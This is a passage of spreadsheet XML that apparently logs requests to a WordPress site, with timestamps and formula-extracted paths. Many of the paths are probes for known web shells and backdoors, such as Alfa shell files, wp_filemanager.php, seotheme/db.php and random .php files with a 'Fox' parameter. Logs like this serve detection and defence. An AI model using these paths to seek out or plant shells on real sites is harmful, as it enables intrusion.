    <row r="5737" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5737" s="1">
        <v>45096.735092592593</v>
      </c>
      <c r="B5737" t="s">
        <v>1929</v>
      </c>
      <c r="C5737" t="s">
        <v>541</v>
      </c>
      <c r="D5737" t="str">
        <f t="shared" si="89"/>
        <v/>
      </c>
      <c r="E5737" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5738" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5738" s="1">
        <v>45095.99428240741</v>
      </c>
      <c r="B5738" t="s">
        <v>1292</v>
      </c>
      <c r="C5738" t="s">
        <v>1579</v>
      </c>
      <c r="D5738" t="str">
        <f t="shared" si="89"/>
        <v>alfanew.php</v>
      </c>
      <c r="E5738" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5739" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5739" s="1">
        <v>45095.994074074071</v>
      </c>
      <c r="B5739" t="s">
        <v>1292</v>
      </c>
      <c r="C5739" t="s">
        <v>1187</v>
      </c>
      <c r="D5739" t="str">
        <f t="shared" si="89"/>
        <v>alfa-rex.php7</v>
      </c>
      <c r="E5739" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5740" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5740" s="1">
        <v>45095.878125000003</v>
      </c>
      <c r="B5740" t="s">
        <v>1930</v>
      </c>
      <c r="C5740" t="s">
        <v>41</v>
      </c>
      <c r="D5740" t="str">
        <f t="shared" si="89"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5740" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5741" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5741" s="1">
        <v>45095.878113425926</v>
      </c>
      <c r="B5741" t="s">
        <v>1930</v>
      </c>
      <c r="C5741" t="s">
        <v>41</v>
      </c>
      <c r="D5741" t="str">
        <f t="shared" si="89"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5741" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5742" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5742" s="1">
        <v>45095.878113425926</v>
      </c>
      <c r="B5742" t="s">
        <v>1930</v>
      </c>
      <c r="C5742" t="s">
        <v>1794</v>
      </c>
      <c r="D5742" t="str">
        <f t="shared" si="89"/>
        <v>wp-content/plugins/hellopress/wp_filemanager.php</v>
      </c>
      <c r="E5742" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5743" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5743" s="1">
        <v>45095.878101851849</v>
      </c>
      <c r="B5743" t="s">
        <v>1930</v>
      </c>
      <c r="C5743" t="s">
        <v>1794</v>
      </c>
      <c r="D5743" t="str">
        <f t="shared" si="89"/>
        <v>wp-content/plugins/hellopress/wp_filemanager.php</v>
      </c>
      <c r="E5743" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5744" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5744" s="1">
        <v>45095.868263888886</v>
      </c>
      <c r="B5744" t="s">
        <v>1930</v>
      </c>
      <c r="C5744" t="s">
        <v>1378</v>
      </c>
      <c r="D5744" t="str">
        <f t="shared" si="89"/>
        <v>wp-content/plugins/wp-file-upload/ROOBOTS.php</v>
      </c>
      <c r="E5744" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5745" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5745" s="1">
        <v>45095.868252314816</v>
      </c>
      <c r="B5745" t="s">
        <v>1930</v>
      </c>
      <c r="C5745" t="s">
        <v>1380</v>
      </c>
      <c r="D5745" t="str">
        <f t="shared" si="89"/>
        <v>wp-content/plugins/TOPXOH/wDR.php</v>
      </c>
      <c r="E5745" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5746" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5746" s="1">
        <v>45095.868252314816</v>
      </c>
      <c r="B5746" t="s">
        <v>1930</v>
      </c>
      <c r="C5746" t="s">
        <v>1379</v>
      </c>
      <c r="D5746" t="str">
        <f t="shared" si="89"/>
        <v>wp-content/plugins/wordpresss3cll/up.php</v>
      </c>
      <c r="E5746" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5747" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5747" s="1">
        <v>45095.868217592593</v>
      </c>
      <c r="B5747" t="s">
        <v>1930</v>
      </c>
      <c r="C5747" t="s">
        <v>1381</v>
      </c>
      <c r="D5747" t="str">
        <f t="shared" si="89"/>
        <v>wp-content/plugins/anttt/simple.php</v>
      </c>
      <c r="E5747" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5748" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5748" s="1">
        <v>45095.697106481479</v>
      </c>
      <c r="B5748" t="s">
        <v>1931</v>
      </c>
      <c r="C5748" t="s">
        <v>5</v>
      </c>
      <c r="D5748" t="str">
        <f t="shared" si="89"/>
        <v/>
      </c>
      <c r="E5748" t="s">
        <v>1932</v>
      </c>
    </row>
    <row r="5749" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5749" s="1">
        <v>45095.453553240739</v>
      </c>
      <c r="B5749" t="s">
        <v>1907</v>
      </c>
      <c r="C5749" t="s">
        <v>43</v>
      </c>
      <c r="D5749" t="str">
        <f t="shared" si="89"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E5749" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5750" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5750" s="1">
        <v>45095.453541666669</v>
      </c>
      <c r="B5750" t="s">
        <v>1907</v>
      </c>
      <c r="C5750" t="s">
        <v>45</v>
      </c>
      <c r="D5750" t="str">
        <f t="shared" si="89"/>
        <v>alfacgiapi/perl.alfa</v>
      </c>
      <c r="E5750" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5751" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5751" s="1">
        <v>45095.453530092593</v>
      </c>
      <c r="B5751" t="s">
        <v>1907</v>
      </c>
      <c r="C5751" t="s">
        <v>46</v>
      </c>
      <c r="D5751" t="str">
        <f t="shared" si="89"/>
        <v>ALFA_DATA/alfacgiapi/perl.alfa</v>
      </c>
      <c r="E5751" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5752" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5752" s="1">
        <v>45095.453530092593</v>
      </c>
      <c r="B5752" t="s">
        <v>1907</v>
      </c>
      <c r="C5752" t="s">
        <v>43</v>
      </c>
      <c r="D5752" t="str">
        <f t="shared" si="89"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E5752" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5753" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5753" s="1">
        <v>45095.164918981478</v>
      </c>
      <c r="B5753" t="s">
        <v>1351</v>
      </c>
      <c r="C5753" t="s">
        <v>1933</v>
      </c>
      <c r="D5753" t="str">
        <f t="shared" si="89"/>
        <v>wp-content/plugins/wordpress-three/miin.php</v>
      </c>
      <c r="E5753" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5754" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5754" s="1">
        <v>45095.164583333331</v>
      </c>
      <c r="B5754" t="s">
        <v>1351</v>
      </c>
      <c r="C5754" t="s">
        <v>1554</v>
      </c>
      <c r="D5754" t="str">
        <f t="shared" si="89"/>
        <v>wp-content/themes/hello-element/footer.php</v>
      </c>
      <c r="E5754" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5755" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5755" s="1">
        <v>45095.089085648149</v>
      </c>
      <c r="B5755" t="s">
        <v>4</v>
      </c>
      <c r="C5755" t="s">
        <v>275</v>
      </c>
      <c r="D5755" t="str">
        <f t="shared" si="89"/>
        <v>category/updates/</v>
      </c>
      <c r="E5755" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="5756" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5756" s="1">
        <v>45095.088854166665</v>
      </c>
      <c r="B5756" t="s">
        <v>4</v>
      </c>
      <c r="C5756" t="s">
        <v>5</v>
      </c>
      <c r="D5756" t="str">
        <f t="shared" si="89"/>
        <v/>
      </c>
      <c r="E5756" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="5757" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5757" s="1">
        <v>45095.05678240741</v>
      </c>
      <c r="B5757" t="s">
        <v>1934</v>
      </c>
      <c r="C5757" t="s">
        <v>1897</v>
      </c>
      <c r="D5757" t="str">
        <f t="shared" si="89"/>
        <v>tag/mumbai-model/</v>
      </c>
      <c r="E5757" t="s">
        <v>1898</v>
      </c>
    </row>
    <row r="5758" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5758" s="1">
        <v>45094.845520833333</v>
      </c>
      <c r="B5758" t="s">
        <v>1927</v>
      </c>
      <c r="C5758" t="s">
        <v>1792</v>
      </c>
      <c r="D5758" t="str">
        <f t="shared" si="89"/>
        <v>wp-includes/blocks/table/int/tmpl/?p=wp-content/</v>
      </c>
      <c r="E5758" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5759" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5759" s="1">
        <v>45094.845347222225</v>
      </c>
      <c r="B5759" t="s">
        <v>1927</v>
      </c>
      <c r="C5759" t="s">
        <v>1793</v>
      </c>
      <c r="D5759" t="str">
        <f t="shared" si="89"/>
        <v>wp-includes/compat/embed/theme/?p=wp-content/</v>
      </c>
      <c r="E5759" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5760" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5760" s="1">
        <v>45094.606145833335</v>
      </c>
      <c r="B5760" t="s">
        <v>1425</v>
      </c>
      <c r="C5760" t="s">
        <v>298</v>
      </c>
      <c r="D5760" t="str">
        <f t="shared" si="89"/>
        <v>inputs.php</v>
      </c>
      <c r="E5760" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5761" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5761" s="1">
        <v>45094.3278125</v>
      </c>
      <c r="B5761" t="s">
        <v>1351</v>
      </c>
      <c r="C5761" t="s">
        <v>1935</v>
      </c>
      <c r="D5761" t="str">
        <f t="shared" si="89"/>
        <v>wp-content/plugins/wordpress-three/miin.php</v>
      </c>
      <c r="E5761" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5762" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5762" s="1">
        <v>45094.327291666668</v>
      </c>
      <c r="B5762" t="s">
        <v>1351</v>
      </c>
      <c r="C5762" t="s">
        <v>1577</v>
      </c>
      <c r="D5762" t="str">
        <f t="shared" ref="D5762:D5825" si="90">MID(C5762,FIND("#", SUBSTITUTE(C5762, "/", "#", 3))+1,LEN(C5762)-FIND("#", SUBSTITUTE(C5762, "/", "#", 3))+1)</f>
        <v>wp-content/themes/hello-element/footer.php</v>
      </c>
      <c r="E5762" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5763" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5763" s="1">
        <v>45094.099456018521</v>
      </c>
      <c r="B5763" t="s">
        <v>1425</v>
      </c>
      <c r="C5763" t="s">
        <v>298</v>
      </c>
      <c r="D5763" t="str">
        <f t="shared" si="90"/>
        <v>inputs.php</v>
      </c>
      <c r="E5763" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5764" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5764" s="1">
        <v>45092.261006944442</v>
      </c>
      <c r="B5764" t="s">
        <v>1936</v>
      </c>
      <c r="C5764" t="s">
        <v>1935</v>
      </c>
      <c r="D5764" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/plugins/wordpress-three/miin.php</v>
      </c>
      <c r="E5764" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5765" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5765" s="1">
        <v>45092.260868055557</v>
      </c>
      <c r="B5765" t="s">
        <v>1936</v>
      </c>
      <c r="C5765" t="s">
        <v>1577</v>
      </c>
      <c r="D5765" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/themes/hello-element/footer.php</v>
      </c>
      <c r="E5765" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5766" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5766" s="1">
        <v>45092.260740740741</v>
      </c>
      <c r="B5766" t="s">
        <v>1936</v>
      </c>
      <c r="C5766" t="s">
        <v>1937</v>
      </c>
      <c r="D5766" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/plugins/wp-daft/t62.php</v>
      </c>
      <c r="E5766" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5767" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5767" s="1">
        <v>45092.236932870372</v>
      </c>
      <c r="B5767" t="s">
        <v>1938</v>
      </c>
      <c r="C5767" t="s">
        <v>1780</v>
      </c>
      <c r="D5767" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/themes/twentyseventeen/page/</v>
      </c>
      <c r="E5767" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5768" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5768" s="1">
        <v>45091.937916666669</v>
      </c>
      <c r="B5768" t="s">
        <v>1939</v>
      </c>
      <c r="C5768" t="s">
        <v>1940</v>
      </c>
      <c r="D5768" t="str">
        <f t="shared" si="90"/>
        <v>rnxwaexa.php?Fox=d3wL7</v>
      </c>
      <c r="E5768" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5769" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5769" s="1">
        <v>45091.937893518516</v>
      </c>
      <c r="B5769" t="s">
        <v>1939</v>
      </c>
      <c r="C5769" t="s">
        <v>43</v>
      </c>
      <c r="D5769" t="str">
        <f t="shared" si="90"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E5769" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5770" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5770" s="1">
        <v>45091.937893518516</v>
      </c>
      <c r="B5770" t="s">
        <v>1939</v>
      </c>
      <c r="C5770" t="s">
        <v>41</v>
      </c>
      <c r="D5770" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5770" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5771" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5771" s="1">
        <v>45091.937881944446</v>
      </c>
      <c r="B5771" t="s">
        <v>1939</v>
      </c>
      <c r="C5771" t="s">
        <v>45</v>
      </c>
      <c r="D5771" t="str">
        <f t="shared" si="90"/>
        <v>alfacgiapi/perl.alfa</v>
      </c>
      <c r="E5771" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5772" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5772" s="1">
        <v>45091.937881944446</v>
      </c>
      <c r="B5772" t="s">
        <v>1939</v>
      </c>
      <c r="C5772" t="s">
        <v>1941</v>
      </c>
      <c r="D5772" t="str">
        <f t="shared" si="90"/>
        <v>rgognmzl.php?Fox=d3wL7</v>
      </c>
      <c r="E5772" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5773" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5773" s="1">
        <v>45091.93787037037</v>
      </c>
      <c r="B5773" t="s">
        <v>1939</v>
      </c>
      <c r="C5773" t="s">
        <v>46</v>
      </c>
      <c r="D5773" t="str">
        <f t="shared" si="90"/>
        <v>ALFA_DATA/alfacgiapi/perl.alfa</v>
      </c>
      <c r="E5773" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5774" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5774" s="1">
        <v>45091.93787037037</v>
      </c>
      <c r="B5774" t="s">
        <v>1939</v>
      </c>
      <c r="C5774" t="s">
        <v>43</v>
      </c>
      <c r="D5774" t="str">
        <f t="shared" si="90"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E5774" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5775" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5775" s="1">
        <v>45091.93787037037</v>
      </c>
      <c r="B5775" t="s">
        <v>1939</v>
      </c>
      <c r="C5775" t="s">
        <v>41</v>
      </c>
      <c r="D5775" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5775" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5776" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5776" s="1">
        <v>45090.460486111115</v>
      </c>
      <c r="B5776" t="s">
        <v>1942</v>
      </c>
      <c r="C5776" t="s">
        <v>41</v>
      </c>
      <c r="D5776" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5776" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5777" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5777" s="1">
        <v>45090.460486111115</v>
      </c>
      <c r="B5777" t="s">
        <v>1942</v>
      </c>
      <c r="C5777" t="s">
        <v>1943</v>
      </c>
      <c r="D5777" t="str">
        <f t="shared" si="90"/>
        <v>gslaakez.php?Fox=d3wL7</v>
      </c>
      <c r="E5777" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5778" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5778" s="1">
        <v>45090.460474537038</v>
      </c>
      <c r="B5778" t="s">
        <v>1942</v>
      </c>
      <c r="C5778" t="s">
        <v>1944</v>
      </c>
      <c r="D5778" t="str">
        <f t="shared" si="90"/>
        <v>dzjpyadt.php?Fox=d3wL7</v>
      </c>
      <c r="E5778" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5779" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5779" s="1">
        <v>45090.460474537038</v>
      </c>
      <c r="B5779" t="s">
        <v>1942</v>
      </c>
      <c r="C5779" t="s">
        <v>43</v>
      </c>
      <c r="D5779" t="str">
        <f t="shared" si="90"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E5779" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5780" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5780" s="1">
        <v>45090.460462962961</v>
      </c>
      <c r="B5780" t="s">
        <v>1942</v>
      </c>
      <c r="C5780" t="s">
        <v>46</v>
      </c>
      <c r="D5780" t="str">
        <f t="shared" si="90"/>
        <v>ALFA_DATA/alfacgiapi/perl.alfa</v>
      </c>
      <c r="E5780" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5781" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5781" s="1">
        <v>45090.460462962961</v>
      </c>
      <c r="B5781" t="s">
        <v>1942</v>
      </c>
      <c r="C5781" t="s">
        <v>43</v>
      </c>
      <c r="D5781" t="str">
        <f t="shared" si="90"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E5781" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5782" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5782" s="1">
        <v>45090.460462962961</v>
      </c>
      <c r="B5782" t="s">
        <v>1942</v>
      </c>
      <c r="C5782" t="s">
        <v>45</v>
      </c>
      <c r="D5782" t="str">
        <f t="shared" si="90"/>
        <v>alfacgiapi/perl.alfa</v>
      </c>
      <c r="E5782" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5783" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5783" s="1">
        <v>45090.460462962961</v>
      </c>
      <c r="B5783" t="s">
        <v>1942</v>
      </c>
      <c r="C5783" t="s">
        <v>41</v>
      </c>
      <c r="D5783" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5783" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5784" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5784" s="1">
        <v>45089.035844907405</v>
      </c>
      <c r="B5784" t="s">
        <v>1945</v>
      </c>
      <c r="C5784" t="s">
        <v>997</v>
      </c>
      <c r="D5784" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/plugins/press/wp-class.php</v>
      </c>
      <c r="E5784" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5785" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5785" s="1">
        <v>45089.035613425927</v>
      </c>
      <c r="B5785" t="s">
        <v>1945</v>
      </c>
      <c r="C5785" t="s">
        <v>997</v>
      </c>
      <c r="D5785" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/plugins/press/wp-class.php</v>
      </c>
      <c r="E5785" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5786" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5786" s="1">
        <v>45089.035370370373</v>
      </c>
      <c r="B5786" t="s">
        <v>1945</v>
      </c>
      <c r="C5786" t="s">
        <v>1946</v>
      </c>
      <c r="D5786" t="str">
        <f t="shared" si="90"/>
        <v>dup-installer/main.installer.php</v>
      </c>
      <c r="E5786" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5787" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5787" s="1">
        <v>45089.035138888888</v>
      </c>
      <c r="B5787" t="s">
        <v>1945</v>
      </c>
      <c r="C5787" t="s">
        <v>1946</v>
      </c>
      <c r="D5787" t="str">
        <f t="shared" si="90"/>
        <v>dup-installer/main.installer.php</v>
      </c>
      <c r="E5787" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5788" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5788" s="1">
        <v>45088.608587962961</v>
      </c>
      <c r="B5788" t="s">
        <v>1947</v>
      </c>
      <c r="C5788" t="s">
        <v>298</v>
      </c>
      <c r="D5788" t="str">
        <f t="shared" si="90"/>
        <v>inputs.php</v>
      </c>
      <c r="E5788" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5789" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5789" s="1">
        <v>45088.230231481481</v>
      </c>
      <c r="B5789" t="s">
        <v>1047</v>
      </c>
      <c r="C5789" t="s">
        <v>5</v>
      </c>
      <c r="D5789" t="str">
        <f t="shared" si="90"/>
        <v/>
      </c>
      <c r="E5789" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="5790" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5790" s="1">
        <v>45088.206099537034</v>
      </c>
      <c r="B5790" t="s">
        <v>1947</v>
      </c>
      <c r="C5790" t="s">
        <v>298</v>
      </c>
      <c r="D5790" t="str">
        <f t="shared" si="90"/>
        <v>inputs.php</v>
      </c>
      <c r="E5790" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5791" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5791" s="1">
        <v>45088.1403587963</v>
      </c>
      <c r="B5791" t="s">
        <v>1948</v>
      </c>
      <c r="C5791" t="s">
        <v>45</v>
      </c>
      <c r="D5791" t="str">
        <f t="shared" si="90"/>
        <v>alfacgiapi/perl.alfa</v>
      </c>
      <c r="E5791" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5792" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5792" s="1">
        <v>45088.140196759261</v>
      </c>
      <c r="B5792" t="s">
        <v>1948</v>
      </c>
      <c r="C5792" t="s">
        <v>41</v>
      </c>
      <c r="D5792" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5792" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5793" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5793" s="1">
        <v>45088.140127314815</v>
      </c>
      <c r="B5793" t="s">
        <v>1948</v>
      </c>
      <c r="C5793" t="s">
        <v>41</v>
      </c>
      <c r="D5793" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5793" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5794" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5794" s="1">
        <v>45088.140069444446</v>
      </c>
      <c r="B5794" t="s">
        <v>1948</v>
      </c>
      <c r="C5794" t="s">
        <v>41</v>
      </c>
      <c r="D5794" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5794" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5795" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5795" s="1">
        <v>45088.14</v>
      </c>
      <c r="B5795" t="s">
        <v>1948</v>
      </c>
      <c r="C5795" t="s">
        <v>41</v>
      </c>
      <c r="D5795" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5795" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5796" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5796" s="1">
        <v>45088.13994212963</v>
      </c>
      <c r="B5796" t="s">
        <v>1948</v>
      </c>
      <c r="C5796" t="s">
        <v>41</v>
      </c>
      <c r="D5796" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5796" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5797" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5797" s="1">
        <v>45088.139884259261</v>
      </c>
      <c r="B5797" t="s">
        <v>1948</v>
      </c>
      <c r="C5797" t="s">
        <v>43</v>
      </c>
      <c r="D5797" t="str">
        <f t="shared" si="90"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E5797" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5798" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5798" s="1">
        <v>45088.139872685184</v>
      </c>
      <c r="B5798" t="s">
        <v>1948</v>
      </c>
      <c r="C5798" t="s">
        <v>41</v>
      </c>
      <c r="D5798" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5798" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5799" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5799" s="1">
        <v>45088.139814814815</v>
      </c>
      <c r="B5799" t="s">
        <v>1948</v>
      </c>
      <c r="C5799" t="s">
        <v>41</v>
      </c>
      <c r="D5799" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5799" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5800" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5800" s="1">
        <v>45088.139803240738</v>
      </c>
      <c r="B5800" t="s">
        <v>1948</v>
      </c>
      <c r="C5800" t="s">
        <v>46</v>
      </c>
      <c r="D5800" t="str">
        <f t="shared" si="90"/>
        <v>ALFA_DATA/alfacgiapi/perl.alfa</v>
      </c>
      <c r="E5800" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5801" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5801" s="1">
        <v>45088.139803240738</v>
      </c>
      <c r="B5801" t="s">
        <v>1948</v>
      </c>
      <c r="C5801" t="s">
        <v>43</v>
      </c>
      <c r="D5801" t="str">
        <f t="shared" si="90"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E5801" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5802" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5802" s="1">
        <v>45087.989328703705</v>
      </c>
      <c r="B5802" t="s">
        <v>1949</v>
      </c>
      <c r="C5802" t="s">
        <v>41</v>
      </c>
      <c r="D5802" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5802" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5803" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5803" s="1">
        <v>45087.989293981482</v>
      </c>
      <c r="B5803" t="s">
        <v>1949</v>
      </c>
      <c r="C5803" t="s">
        <v>41</v>
      </c>
      <c r="D5803" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5803" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5804" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5804" s="1">
        <v>45087.989108796297</v>
      </c>
      <c r="B5804" t="s">
        <v>1949</v>
      </c>
      <c r="C5804" t="s">
        <v>1794</v>
      </c>
      <c r="D5804" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/plugins/hellopress/wp_filemanager.php</v>
      </c>
      <c r="E5804" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5805" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5805" s="1">
        <v>45087.98909722222</v>
      </c>
      <c r="B5805" t="s">
        <v>1949</v>
      </c>
      <c r="C5805" t="s">
        <v>1794</v>
      </c>
      <c r="D5805" t="str">
        <f t="shared" si="90"/>
        <v>wp-content/plugins/hellopress/wp_filemanager.php</v>
      </c>
      <c r="E5805" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5806" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5806" s="1">
        <v>45087.848020833335</v>
      </c>
      <c r="B5806" t="s">
        <v>1950</v>
      </c>
      <c r="C5806" t="s">
        <v>5</v>
      </c>
      <c r="D5806" t="str">
        <f t="shared" si="90"/>
        <v/>
      </c>
      <c r="E5806" t="s">
        <v>286</v>
      </c>
    </row>
    <row r="5807" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5807" s="1">
        <v>45087.061944444446</v>
      </c>
